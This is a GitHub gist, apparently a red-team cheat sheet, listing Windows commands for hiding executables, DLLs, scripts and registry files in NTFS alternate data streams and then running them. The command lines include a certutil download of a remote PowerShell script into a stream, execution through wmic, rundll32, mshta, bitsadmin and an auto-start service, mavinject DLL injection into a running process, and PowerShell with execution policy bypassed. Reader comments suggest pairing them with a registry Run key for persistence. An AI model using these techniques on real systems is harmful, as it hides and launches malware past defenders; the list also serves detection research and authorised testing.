Last active
October 8, 2025 08:06
-
Star
(238)
You must be signed in to star a gist -
Fork
(89)
You must be signed in to fork a gist
-
-
Save api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f to your computer and use it in GitHub Desktop.
Execute from Alternate Streams
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #Add content to ADS | |
| type C:\temp\evil.exe > "C:\Program Files (x86)\TeamViewer\TeamViewer12_Logfile.log:evil.exe" | |
| extrac32 C:\ADS\procexp.cab c:\ADS\file.txt:procexp.exe | |
| findstr /V /L W3AllLov3DonaldTrump c:\ADS\procexp.exe > c:\ADS\file.txt:procexp.exe | |
| certutil.exe -urlcache -split -f https://raw.githubusercontent.com/Moriarty2016/git/master/test.ps1 c:\temp:ttt | |
| makecab c:\ADS\autoruns.exe c:\ADS\cabtest.txt:autoruns.cab | |
| print /D:c:\ads\file.txt:autoruns.exe c:\ads\Autoruns.exe | |
| reg export HKLM\SOFTWARE\Microsoft\Evilreg c:\ads\file.txt:evilreg.reg | |
| regedit /E c:\ads\file.txt:regfile.reg HKEY_CURRENT_USER\MyCustomRegKey | |
| expand \\webdav\folder\file.bat c:\ADS\file.txt:file.bat | |
| esentutl.exe /y C:\ADS\autoruns.exe /d c:\ADS\file.txt:autoruns.exe /o | |
| powershell -command " & {(Get-Content C:\ADS\file.exe -Raw | Set-Content C:\ADS\file.txt -Stream file.exe)}" | |
| #Executing the ADS content | |
| * WMIC | |
| wmic process call create '"C:\Program Files (x86)\TeamViewer\TeamViewer12_Logfile.log:evil.exe"' | |
| * Rundll32 | |
| rundll32 "C:\Program Files (x86)\TeamViewer\TeamViewer13_Logfile.log:ADSDLL.dll",DllMain | |
| rundll32.exe advpack.dll,RegisterOCX not_a_dll.txt:test.dll | |
| rundll32.exe ieadvpack.dll,RegisterOCX not_a_dll.txt:test.dll | |
| * Cscript | |
| cscript "C:\Program Files (x86)\TeamViewer\TeamViewer13_Logfile.log:Script.vbs" | |
| * Wscript | |
| wscript c:\ads\file.txt:script.vbs | |
| * Forfiles | |
| forfiles /p c:\windows\system32 /m notepad.exe /c "c:\temp\shellloader.dll:bginfo.exe" | |
| * Mavinject.exe | |
| c:\windows\SysWOW64\notepad.exe | |
| tasklist | findstr notepad | |
| notepad.exe 4172 31C5CE94259D4006 2 18,476 K | |
| type c:\temp\AtomicTest.dll > "c:\Program Files (x86)\TeamViewer\TeamViewer13_Logfile.log:Atomic.dll" | |
| c:\windows\WinSxS\wow64_microsoft-windows-appmanagement-appvwow_31bf3856ad364e35_10.0.16299.15_none_e07aa28c97ebfa48\mavinject.exe 4172 /INJECTRUNNING "c:\Program Files (x86)\TeamViewer\TeamViewer13_Logfile.log:Atomic.dll" | |
| * MSHTA | |
| mshta "C:\Program Files (x86)\TeamViewer\TeamViewer13_Logfile.log:helloworld.hta" | |
| * Control.exe | |
| control.exe c:\windows\tasks\zzz:notepad_reflective_x64.dll | |
| https://twitter.com/bohops/status/954466315913310209 | |
| * Create service and run | |
| sc create evilservice binPath= "\"c:\ADS\file.txt:cmd.exe\" /c echo works > \"c:\ADS\works.txt\"" DisplayName= "evilservice" start= auto | |
| sc start evilservice | |
| https://oddvar.moe/2018/04/11/putting-data-in-alternate-data-streams-and-how-to-execute-it-part-2/ | |
| * Powershell.exe | |
| powershell -ep bypass - < c:\temp:ttt | |
| * Powershell.exe | |
| powershell -command " & {(Get-Content C:\ADS\1.txt -Stream file.exe -Raw | Set-Content c:\ADS\file.exe) | start-process c:\ADS\file.exe}" | |
| * Powershell.exe | |
| Invoke-CimMethod -ClassName Win32_Process -MethodName Create -Arguments @{CommandLine = C:\ads\folder:file.exe} | |
| * Regedit.exe | |
| regedit c:\ads\file.txt:regfile.reg | |
| * Bitsadmin.exe | |
| bitsadmin /create myfile | |
| bitsadmin /addfile myfile c:\windows\system32\notepad.exe c:\data\playfolder\notepad.exe | |
| bitsadmin /SetNotifyCmdLine myfile c:\ADS\1.txt:cmd.exe NULL | |
| bitsadmin /RESUME myfile | |
| * AppVLP.exe | |
| AppVLP.exe c:\windows\tracing\test.txt:ha.exe |
Thanks. Good to hear.
Hi. This is not persistence mechanisms. This is only ways of hiding programs withing ADS and ways of executing it. How to place your persistence is up to you. For instance a RUN key in registry could launch the WMIC command that execute data from an Alternate Data stream.
"powershell Start-Process -FilePath xx.exe" can execute the file too~
Will AV detect the malicious payload?
@jmaravi - yes.
What about if you needed to delete an ADS? Not just empty it.
@zappermax you can remove an ADS using the Remove-Item cmdlet
https://docs.microsoft.com/en-us/archive/blogs/askcore/alternate-data-streams-in-ntfs
good job my brother and Allah Almighty will help you
That's incredible man
Amazing!
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
Great work man ,this helps a lot 😄